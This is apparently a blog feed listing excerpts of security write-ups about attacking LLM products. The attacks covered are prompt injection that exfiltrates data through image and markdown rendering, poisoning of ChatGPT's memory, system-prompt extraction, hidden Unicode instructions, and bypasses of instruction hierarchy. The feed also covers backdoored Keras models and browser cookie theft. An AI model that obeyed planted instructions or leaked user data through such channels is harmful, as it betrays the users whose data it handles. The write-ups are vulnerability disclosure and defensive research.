Embrace The Red

Google Colab AI: Data Leakage Through Image Rendering Fixed. Some Risks Remain.

1 year 8 months ago

Google Colab AI, now just called Gemini in Colab, was vulnerable to data leakage via image rendering.

This is an older bug report, dating back to November 29, 2023. However, recent events prompted me to write this up:

Google did not reward this finding, and
Colab now automatically puts Notebook content (untrusted data) into the prompt.

Let’s explore the specifics.

Google Colab AI - Revealing the System Prompt

At the end of November last year, I noticed that there was a “Colab AI” feature, which integrated an LLM to chat with and write code. Naturally, I grabbed the system prompt, and it contained instructions that begged the LLM to not render images.

Breaking Instruction Hierarchy in OpenAI's gpt-4o-mini

Embrace The Red

1 year 8 months ago

Recently, OpenAI announced gpt-4o-mini and there are some interesting updates, including safety improvements regarding “Instruction Hierarchy”:

OpenAI puts this in the light of “safety”, the word security is not mentioned in the announcement.

Additionally, this The Verge article titled “OpenAI’s latest model will block the ‘ignore all previous instructions’ loophole” created interesting discussions on X, including a first demo bypass.

I spent some time this weekend to get a better intuition about gpt-4o-mini model and instruction hierarchy, and the conclusion is that system instructions are still not a security boundary.

Sorry, ChatGPT Is Under Maintenance: Persistent Denial of Service through Prompt Injection and Memory Attacks

Embrace The Red

1 year 8 months ago

Imagine you visit a website with ChatGPT, and suddenly, it stops working entirely!

In this post we show how an attacker can use prompt injection to cause a persistent denial of service that lasts across chat sessions for a user.

Hacking Memories

Previously we discussed how ChatGPT is vulnerable to automatic tool invocation of the memory tool. This can be used by an attacker during prompt injection to ingest malicious or fake memories into your ChatGPT.

GitHub Copilot Chat: From Prompt Injection to Data Exfiltration

Embrace The Red

1 year 9 months ago

This post highlights how the GitHub Copilot Chat VS Code Extension was vulnerable to data exfiltration via prompt injection when analyzing untrusted source code.

GitHub Copilot Chat

GitHub Copilot Chat is a VS Code Extension that allows a user to chat with source code, refactor code, get info about terminal output, or general help about VS Code, and things along those lines.

It does so by sending source code, along with the user’s questions to a large language model (LLM). A bit of a segue, but if you are curious, here are its system instructions, highlighting some interesting prompting strategies and that it is powered by GPT-4:

Automatic Tool Invocation when Browsing with ChatGPT - Threats and Mitigations

Embrace The Red

1 year 10 months ago

In the previous post we demonstrated how instructions embedded in untrusted data can invoke ChatGPT’s memory tool. The examples we looked at included Uploaded Files, Connected Apps and also the Browsing tool.

When it came to the browsing tool we observed that mitigations were put in place and older demo exploits did not work anymore. After chatting with other security researchers, I learned that they had observed the same.

ChatGPT: Hacking Memories with Prompt Injection

Embrace The Red

1 year 10 months ago

OpenAI recently introduced a memory feature in ChatGPT, enabling it to recall information across sessions, creating a more personalized user experience.

However, with this new capability comes risks. Imagine if an attacker could manipulate your AI assistant (chatbot or agent) to remember false information, bias or even instructions, or delete all your memories! This is not a futuristic scenario, the attack that makes this possible is called Indirect Prompt Injection.

Machine Learning Attack Series: Backdooring Keras Models and How to Detect It

Embrace The Red

1 year 10 months ago

This post is part of a series about machine learning and artificial intelligence.

Adversaries often leverage supply chain attacks to gain footholds. In machine learning model deserialization issues are a significant threat, and detecting them is crucial, as they can lead to arbitrary code execution. We explored this attack with Python Pickle files in the past.

In this post we are covering backdooring the original Keras Husky AI model from the Machine Learning Attack Series, and afterwards we investigate tooling to detect the backdoor.

Pivot to the Clouds: Cookie Theft in 2024

Embrace The Red

1 year 10 months ago

Recently Google published a blog about detecting browser data theft using Windows Event Logs.

There are some good points in the post for defenders on how to detect misuse of DPAPI calls attempting to grab sensitive browser data.

But, what about the Remote Debugging feature?

This made me curious to revisit the state of the remote debugging feature of browsers for grabbing sensitive information, including cookies.

We discussed cookie theft techniques in the past, even presented about it at the CCC some 5+ years ago and helped add the TTP to the MITRE ATT&CK matrix.

Bobby Tables but with LLM Apps - Google NotebookLM Data Exfiltration

Embrace The Red

1 year 11 months ago

Google’s NotebookLM is an experimental project that was released last year. It allows users to upload files and analyze them with a large language model (LLM).

However, it is vulnerable to Prompt Injection, meaning that uploaded files can manipulate the chat conversation and control what the user sees in responses.

There is currently no known solution to these kinds of attacks, so users can’t implicitly trust responses from large language model applications when untrusted data is involved. Additionally though NotebookLM is also vulnerable to data exfiltration when processing untrusted data.

HackSpaceCon 2024: Short Trip Report, Slides and Rocket Launch

Embrace The Red

1 year 11 months ago

This week was HackSpaceCon 2024. It was the first time I attended and it was fantastic.

The conference was at the Kennedy Space Center! Yes, right there and the swag and talks matched the world class location.

The keynote “Buckle up! Let’s make the world a safer place” was by Dave Kennedy, who provided great insights on attacker strategies of the past and present, the importance of active threat hunting and challenges ahead. A great specific example he gave was how simple modifications to off-the-shelf malware (still) go entirely under the radar.

Google AI Studio Data Exfiltration via Prompt Injection - Possible Regression and Fix

Embrace The Red

1 year 11 months ago

What I like about the rapid advancements and excitement about AI over the last few years is that we see a resurgence of the testing discipline!

Software testing is hard, and adding AI to the mix does not make it easier at all!

Google AI Studio - Initially not vulnerable to data leakage via image rendering

When Google released AI Studio last year I checked for the common image markdown data exfiltration vulnerability and it was not vulnerable.

The dangers of AI agents unfurling hyperlinks and what to do about it

Embrace The Red

1 year 11 months ago

About a year ago we talked about how developers can’t intrinsically trust LLM responses and common threats that AI Chatbots face and how attackers can exploit them, including ways to exfiltrate data.

One of the threats is unfurling of hyperlinks, which can lead to data exfiltration and is something often seen in Chatbots. So, let’s shine more light on it, including practical guidance on how to mitigate it with the example of Slack Apps.

ASCII Smuggler - Improvements

Embrace The Red

2 years ago

I added a couple of features and improvements to ASCII Smuggler, including:

Optional rendering of the BEGIN and END Unicode Tags when crafting hidden text
Added a feature to URL decode the input before checking for hidden text
Output Modes for Decoding: Switch between highlighting the hidden text amongst the regular content, or only showing the hidden text in the output
The selected options are remembered now (using local storage)
Updated the UI to make it look nicer (e.g bigger fonts), and it works better on mobile now

The tool is here.

Who Am I? Conditional Prompt Injection Attacks with Microsoft Copilot

Embrace The Red

2 years ago

Building reliable prompt injection payloads is challenging at times. It’s this new world with large language model (LLM) applications that can be instructed with natural language and they mostly follow instructions… but not always.

Attackers have the same challenges around prompt engineering as normal users.

Prompt Injection Exploit Development

Attacks always get better over time. And as more features are being added to LLM applications, the degrees of freedom for attackers increases as well.

Google Gemini: Planting Instructions For Delayed Automatic Tool Invocation

Embrace The Red

2 years 1 month ago

Last November, while testing Google Bard (now called Gemini) for vulnerabilities, I had a couple of interesting observations when it comes to automatic tool invocation.

Confused Deputy - Automatic Tool Invocation

First, what do I mean by this… “automatic tool invocation”…

Consider the following scenario: An attacker sends a malicious email to a user containing instructions to call an external tool. Google named these tools Extensions.

When the user analyzes the email with an LLM, it interprets the instructions and calls the external tool, leading to a kind of request forgery or maybe better called automatic tool invocation.

ChatGPT: Lack of Isolation between Code Interpreter sessions of GPTs

Embrace The Red

2 years 1 month ago

Your Code Interpreter sandbox, also known as Advanced Data Analysis sessions, are shared between private and public GPTs. Yes, your actual compute container and its storage is shared. Each user gets their own isolated container, but if a user uses multiple GPTs and stores files in Code Interpreter all GPTs can access (and also overwrite) each others files.

This is true also for files uploaded/created with private GPTs and ChatGPT itself.

Video: ASCII Smuggling and Hidden Prompt Instructions

Embrace The Red

2 years 1 month ago

A couple of weeks ago hidden prompt injections were discovered and we covered it at the time.

This video explains it in more detail, and also highlights implications beyond hiding instructions, including what I call ASCII Smuggling. This is the usage of Unicode Tags Block characters to both craft and deciper hidden messages in plain sight.

Hidden Prompt Injections with Anthropic Claude

Embrace The Red

2 years 1 month ago

A few weeks ago while waiting at the airport lounge I was wondering how other Chatbots, besides ChatGPT, handle hidden Unicode Tags code points.

A quick reminder: Unicode Tags code points are invisible in UI elements, but ChatGPT was able to interpret them and follow hidden instructions. Riley Goodside discovered it.

What about Anthropic Claude?

While waiting for a flight I figured to look at Anthropic Claude. Turns out it has the same issue as ChatGPT had. I reported it behind the scenes, but got the following final reply and the ticket was closed.

Exploring Google Bard's Data Visualization Feature (Code Interpreter)

Embrace The Red

2 years 2 months ago

Last November Google had an interesting update to Google Bard. This updated included the ability to solve math equations and draw charts based on data.

What does this mean and why is it interesting?

It means that Google Bard has access to a computer and can run more complex programs, including Python code that plots graphs!

Let’s explore this with a simple example.

Drawing Charts with Google Bard

The following prompt will create a chart:

AWS Fixes Data Exfiltration Attack Angle in Amazon Q for Business

Embrace The Red

2 years 2 months ago

A few weeks ago Amazon released the Preview of Amazon Q for Business, and after looking at it I found a data exfiltration angle via rendering markdown/hyperlinks and reported it to Amazon.

Amazon reacted quickly and mitigated the problem. This post shares further details and how it was fixed.

The Problem

An Indirect Prompt Injection attack can cause the LLM to return markdown tags. This allows an adversary who’s data makes it into the chat context (e.g via an uploaded file) to achieve data exfiltration of the victim’s data by rendering hyperlinks.

Checked

9 hours 11 minutes ago

Embrace The Red

Managed ad